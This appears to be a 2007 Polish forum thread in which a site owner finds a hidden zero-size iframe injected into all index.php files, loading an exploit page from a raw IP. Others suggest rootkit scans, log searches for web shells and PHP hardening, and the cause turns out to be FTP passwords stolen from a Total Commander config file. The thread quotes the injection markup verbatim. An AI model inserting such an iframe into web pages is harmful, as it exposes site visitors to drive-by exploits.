Guciooo 0 Zgłoś post Napisano Sierpień 9, 2007 Do każdej z moich stron dokleja się taki kod: <iframe src='http://81.95.149.27/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> Wkleja się to na samym koncu po "</html>" lub nawet w środku po <body>. Przejrzałem konfig apacha i php.ini, nie wiem gdzie ktos to wstawił :/ Mam serwer w OVH. Ktos mi napisał w mailu, że jak wchodzi na moją www to "system antywirusowy AVAST wykrywa za każdym razem dwa wirusy ms07-017[2].ani". Jak się tego pozbyć ? Apacha narazie wyłączyłem. Udostępnij ten post Link to postu Udostępnij na innych stronach
patryk 451 Zgłoś post Napisano Sierpień 9, 2007 Wygląda na to, że ktoś włamał się na Twój serwer i zainstalował trojana, który dokleja taką linijkę do każdej strony. Użyj RKHunter albo Chrootkit na początek. Jeśli używasz jakiegoś niemądrego cmsa to możliwe, że tylko on zostal zaatakowany, nie cała maszyna. Udostępnij ten post Link to postu Udostępnij na innych stronach
Guciooo 0 Zgłoś post Napisano Sierpień 9, 2007 Teraz odkryłem ze ten kod jest dopisany do wszystkich plików index.php Mam na serwerze ze 20 domen, na każdej z nich ten plik index.php został zmieniony o tej samej godzinie co do minuty. Udostępnij ten post Link to postu Udostępnij na innych stronach
patryk 451 Zgłoś post Napisano Sierpień 9, 2007 Czyli w takim razie ktoś wgrał Ci przez dziurę w skrypcie skrypt który podmienił pliki korzystając z braku odpowiednich zabezpieczeń na poziomie PHP (openbasedir, safemode itd). Przeszukaj logi pod kontem r57shell, phpshell i tego typu rzeczy no i powyłączaj niebezpieczne funkcje w php żeby nie doszło do czegoś takiego w przyszłości. Udostępnij ten post Link to postu Udostępnij na innych stronach
Guciooo 0 Zgłoś post Napisano Sierpień 9, 2007 Juz wiem. To było zmienione przez FTPa. Ktos pobrał z mojego kompa plik konfiguracyjny Total Commandera gdzie miałem zapisane loginy i hasła. Następnie automatem poszukał plików index i tam dokleił ten kod. Wniosek: nie zapisywać haseł w Total commanderze. Ip tego mądrali: 81.95.149.26 Udostępnij ten post Link to postu Udostępnij na innych stronach
Noone 19 Zgłoś post Napisano Sierpień 9, 2007 Wniosek: nie zapisywać haseł w Total commanderze. Wniosek: Zabezpieczyć swój komputer. Udostępnij ten post Link to postu Udostępnij na innych stronach